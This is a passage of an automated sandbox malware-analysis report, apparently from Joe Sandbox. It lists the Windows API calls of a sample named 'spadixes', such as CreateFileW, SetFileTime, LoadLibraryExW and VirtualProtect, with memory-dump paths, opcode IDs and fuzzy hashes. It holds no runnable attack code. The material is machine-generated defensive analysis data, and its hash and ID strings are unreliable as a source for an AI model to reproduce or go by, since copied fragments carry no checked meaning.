                                                                                                                                                          • Part of subcall function 008E1145: ExitProcess.KERNEL32 ref: 008E1154
                                                                                                                                                          • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                                                                                                        • RtlAllocateHeap.NTDLL(01470000,00000000,00000001,00000001,00000000,?,?,008DF507,?,0000000E), ref: 008E399F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1372826849-0
                                                                                                                                                        • Opcode ID: 3784d7980bd02219abeb2c751ca26432c0e4f0cba1d782e049381d524d3fdee0
                                                                                                                                                        • Instruction ID: f441c4d6594ad5ea3a7976a1ba2592e2ce4e3c6ce9bea72f8d4b277be13108b7
                                                                                                                                                        • Opcode Fuzzy Hash: 3784d7980bd02219abeb2c751ca26432c0e4f0cba1d782e049381d524d3fdee0
                                                                                                                                                        • Instruction Fuzzy Hash: 6401B936349281AAE6153B2BDC4AB2E3798FB83764F210029F505DB283DFB19D0046A5
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0090C385,?,?,?,?,?,00000004), ref: 0090C6F2
                                                                                                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0090C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0090C708
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,0090C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0090C70F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3397143404-0
                                                                                                                                                        • Opcode ID: 2e45fcdc77c34861bbb4119a7b854e4b19ac6d8cd6b5908f7f7a9348d08d74a8
                                                                                                                                                        • Instruction ID: 429e1e3d7c6eb5c8c969c893142d6d77a9a437ac38b5ee1bd0b138e57790d0ff
                                                                                                                                                        • Opcode Fuzzy Hash: 2e45fcdc77c34861bbb4119a7b854e4b19ac6d8cd6b5908f7f7a9348d08d74a8
                                                                                                                                                        • Instruction Fuzzy Hash: 5EE0863A146214BBD7211F54AC09FCE7B18AB0AB64F104210FF14690E097B125119798
                                                                                                                                                        APIs
                                                                                                                                                        • _free.LIBCMT ref: 0090BB72
                                                                                                                                                          • Part of subcall function 008E1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,008E7A85), ref: 008E1CB1
                                                                                                                                                          • Part of subcall function 008E1C9D: GetLastError.KERNEL32(00000000,?,008E7A85), ref: 008E1CC3
                                                                                                                                                        • _free.LIBCMT ref: 0090BB83
                                                                                                                                                        • _free.LIBCMT ref: 0090BB95
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                        • Opcode ID: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
                                                                                                                                                        • Instruction ID: ac84544b6a5f00c6f2fd523611b0958038b4259029f23d9b903357247a253c66
                                                                                                                                                        • Opcode Fuzzy Hash: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
                                                                                                                                                        • Instruction Fuzzy Hash: E0E012B26417818BDE24657E6E4CEB323CC9F05355724081DB459E7186CF34E84085A4
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 008C22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME), ref: 008C2303
                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008C25A1
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 008C2618
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0093503A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3815369404-0
                                                                                                                                                        • Opcode ID: 082a3e56ec7c4721b56d85f29078c3341ba3dc8552726843453200e269f9e0e6
                                                                                                                                                        • Instruction ID: d3ab2ec1264865d7b213a127f60a8dcde15f9d8b86b6721be2d2b891363c93a4
                                                                                                                                                        • Opcode Fuzzy Hash: 082a3e56ec7c4721b56d85f29078c3341ba3dc8552726843453200e269f9e0e6
                                                                                                                                                        • Instruction Fuzzy Hash: 2371AFB59293458BC714EF6EE994999BBFCFB99344780412EE129C77B2CB308402EF15
                                                                                                                                                        APIs
                                                                                                                                                        • ___lock_fhandle.LIBCMT ref: 008EEA29
                                                                                                                                                        • __close_nolock.LIBCMT ref: 008EEA42
                                                                                                                                                          • Part of subcall function 008E7BDA: __getptd_noexit.LIBCMT ref: 008E7BDA
                                                                                                                                                          • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1046115767-0
                                                                                                                                                        • Opcode ID: 8902d4317f079894b478783779d89f6f87f834ac13d708cd46908e3bf05cf208
                                                                                                                                                        • Instruction ID: 6e791a2111228ea6e64ab371b262a6e55b12c95a7cf147aed6367e1bae4c6139
                                                                                                                                                        • Opcode Fuzzy Hash: 8902d4317f079894b478783779d89f6f87f834ac13d708cd46908e3bf05cf208
                                                                                                                                                        • Instruction Fuzzy Hash: AF11C672809AE58AD311BF6ED8413183A61FF93335F264364E820DF2E3D7B4880097A2
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 008E395C: __FF_MSGBANNER.LIBCMT ref: 008E3973
                                                                                                                                                          • Part of subcall function 008E395C: __NMSG_WRITE.LIBCMT ref: 008E397A
                                                                                                                                                          • Part of subcall function 008E395C: RtlAllocateHeap.NTDLL(01470000,00000000,00000001,00000001,00000000,?,?,008DF507,?,0000000E), ref: 008E399F
                                                                                                                                                        • std::exception::exception.LIBCMT ref: 008DF51E
                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 008DF533
                                                                                                                                                          • Part of subcall function 008E6805: RaiseException.KERNEL32(?,?,0000000E,00976A30,?,?,?,008DF538,0000000E,00976A30,?,00000001), ref: 008E6856
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3902256705-0
                                                                                                                                                        • Opcode ID: f92691be497fbf685b1e89045504cd9a8a5acc3f367b029e01bffad0cc3647fa
                                                                                                                                                        • Instruction ID: a6467cda346b06f3950da57a0d573e4b926d7e01afe6f8c330f9d428a6a6e646
                                                                                                                                                        • Opcode Fuzzy Hash: f92691be497fbf685b1e89045504cd9a8a5acc3f367b029e01bffad0cc3647fa
                                                                                                                                                        • Instruction Fuzzy Hash: ABF0813110425EA7DB14BF9DE80199E7BE8FF02354F604226FA09D2282DBB0965096A6
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                                                                                                        • __lock_file.LIBCMT ref: 008E3629
                                                                                                                                                          • Part of subcall function 008E4E1C: __lock.LIBCMT ref: 008E4E3F
                                                                                                                                                        • __fclose_nolock.LIBCMT ref: 008E3634
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2800547568-0
                                                                                                                                                        • Opcode ID: 97e895058b01db93d447a56f9a93c1011f6b2bf39cc898ceddeda2c23b0f8dba
                                                                                                                                                        • Instruction ID: 03fde320d666b026e1160cbabc49272e5d6c5b293e65b6a8eed2e1ba206cdd8d
                                                                                                                                                        • Opcode Fuzzy Hash: 97e895058b01db93d447a56f9a93c1011f6b2bf39cc898ceddeda2c23b0f8dba
                                                                                                                                                        • Instruction Fuzzy Hash: D2F0BB31801695BAD7117BBB880A76E76A0FF63334F258108E415EB2E1C77C8E01AB56
                                                                                                                                                        APIs
                                                                                                                                                        • __flush.LIBCMT ref: 008E2A0B
                                                                                                                                                          • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __flush__getptd_noexit
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4101623367-0
                                                                                                                                                        • Opcode ID: 2c995f787f38fa14e512786b2520d42173e1a585f10c25489fac9dfc8255258b
                                                                                                                                                        • Instruction ID: 510a49c18cb75d9d7615ec7721d70721c06be144db6c82b1b71c3c45bbe0fe62
                                                                                                                                                        • Opcode Fuzzy Hash: 2c995f787f38fa14e512786b2520d42173e1a585f10c25489fac9dfc8255258b
                                                                                                                                                        • Instruction Fuzzy Hash: 024193716007969FDB2C9E6BC8819AE7BAEFF46360B24853DE855C7241EB70DD418B40
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                        • Opcode ID: 98affbed7af324c9d6ee0f4f2a2251ddaea5954a9c3f026677167e3f7d8d9bee
                                                                                                                                                        • Instruction ID: 357f500893b8f2eaa715cc3626edcf72645600e5d1d8998d35cd7eab0f2ffa85
                                                                                                                                                        • Opcode Fuzzy Hash: 98affbed7af324c9d6ee0f4f2a2251ddaea5954a9c3f026677167e3f7d8d9bee
                                                                                                                                                        • Instruction Fuzzy Hash: 4831B174A001099BD718EF5CC484A69FBB6FB49344B6487A6E40ACF366DB31EDC1CB90
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 008C4214: FreeLibrary.KERNEL32(00000000,?), ref: 008C4247
                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008C39FE,?,00000001), ref: 008C41DB
                                                                                                                                                          • Part of subcall function 008C4291: FreeLibrary.KERNEL32(00000000), ref: 008C42C4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$Free$Load
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2391024519-0
                                                                                                                                                        • Opcode ID: 46298b96c20b63bb4537ecdc4dfc6fe40f5a896b907682eea0c9f7ba9bf0db31
                                                                                                                                                        • Instruction ID: fa294c00d61b4897a0515a25941a0ff7c6d96e3fe0a70d8105b86353b8852d44
                                                                                                                                                        • Opcode Fuzzy Hash: 46298b96c20b63bb4537ecdc4dfc6fe40f5a896b907682eea0c9f7ba9bf0db31
                                                                                                                                                        • Instruction Fuzzy Hash: 5611C131600206AACB10AB78DC27F9E77B9EF80704F10842DB596E61C1DB70DA809B62
                                                                                                                                                        APIs
                                                                                                                                                        • ___lock_fhandle.LIBCMT ref: 008EAFC0
                                                                                                                                                          • Part of subcall function 008E7BDA: __getptd_noexit.LIBCMT ref: 008E7BDA
                                                                                                                                                          • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __getptd_noexit$___lock_fhandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1144279405-0
                                                                                                                                                        • Opcode ID: abd9f7acd942dabb2a04648aabcb2a2153977b7be34fbc52c469272c5377155f
                                                                                                                                                        • Instruction ID: c82d2e714370a112a93928273ba4da5f179310f9c60cbb6a7717f041b5d7c361
                                                                                                                                                        • Opcode Fuzzy Hash: abd9f7acd942dabb2a04648aabcb2a2153977b7be34fbc52c469272c5377155f
                                                                                                                                                        • Instruction Fuzzy Hash: CD11B272804AD49FD7126FAA980176A3A60FF83335F254250E434DB1E3DBB4AD009BA2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                        • Opcode ID: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
                                                                                                                                                        • Instruction ID: 0cb3e3041c8c82844ca15c53d0a0b7af48076d8df992e045d2b9c1e1521c1203
                                                                                                                                                        • Opcode Fuzzy Hash: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
                                                                                                                                                        • Instruction Fuzzy Hash: 1001127150010DAECF05EF64C892DEEBB78FB11344F108129B556D61A5EA30DA89DF61
                                                                                                                                                        APIs
                                                                                                                                                        • __lock_file.LIBCMT ref: 008E2AED
                                                                                                                                                          • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __getptd_noexit__lock_file
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2597487223-0
                                                                                                                                                        • Opcode ID: a30d2521b18807fca78640200d4bba2543636f40a430b7299a49ee0ed8349a08
                                                                                                                                                        • Instruction ID: d51cb2ce9f02367e5eefdb181089b6ac5cd1fdeb7f7faee59ed6975d7117d196
                                                                                                                                                        • Opcode Fuzzy Hash: a30d2521b18807fca78640200d4bba2543636f40a430b7299a49ee0ed8349a08
                                                                                                                                                        • Instruction Fuzzy Hash: CFF0C231900295EADF21AF6E8C0279F3AA9FF42320F148425B414DB191DB788A62DB52
                                                                                                                                                        APIs
                                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,008C39FE,?,00000001), ref: 008C4286
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                                        • Opcode ID: ec8b013898e379444824d6eb8a59ad88f581237ef901557f1edb4e2b123bcab9
                                                                                                                                                        • Instruction ID: c051c718a5291b5facb6cf79ce839aa95888606e2d23fdf17d3f5d4e259b63fb
                                                                                                                                                        • Opcode Fuzzy Hash: ec8b013898e379444824d6eb8a59ad88f581237ef901557f1edb4e2b123bcab9
                                                                                                                                                        • Instruction Fuzzy Hash: B2F0F275509702CFCB349F65D8A6D66BBF5FB0532A3249A2EF19682610C7329980DB50
                                                                                                                                                        APIs
                                                                                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008C40C6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LongNamePath
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 82841172-0
                                                                                                                                                        • Opcode ID: 2b610d68bc49917f67fde0643e9e5349c451d831a5822dbf8b9e1ce850ff4a1c
                                                                                                                                                        • Instruction ID: f8a2cbcb32a6a6aab58aacc08bcf92f161f7caf873f4f2337f5a99b03a796e25
                                                                                                                                                        • Opcode Fuzzy Hash: 2b610d68bc49917f67fde0643e9e5349c451d831a5822dbf8b9e1ce850ff4a1c
                                                                                                                                                        • Instruction Fuzzy Hash: 4DE0C23A6042345BC711A658CC46FEA77ADEFCD6A0F0900B9FE09E7244EA74E9819691
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 015D0893
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.1284950359.00000000015CF000.00000040.00000020.00020000.00000000.sdmp, Offset: 015CF000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_15cf000_spadixes.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                        • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                                                                                        • Instruction ID: 9ad41d97b11001ac3803af5b00d0b6dc008d615f903f69bea92bbe43d246b5fa
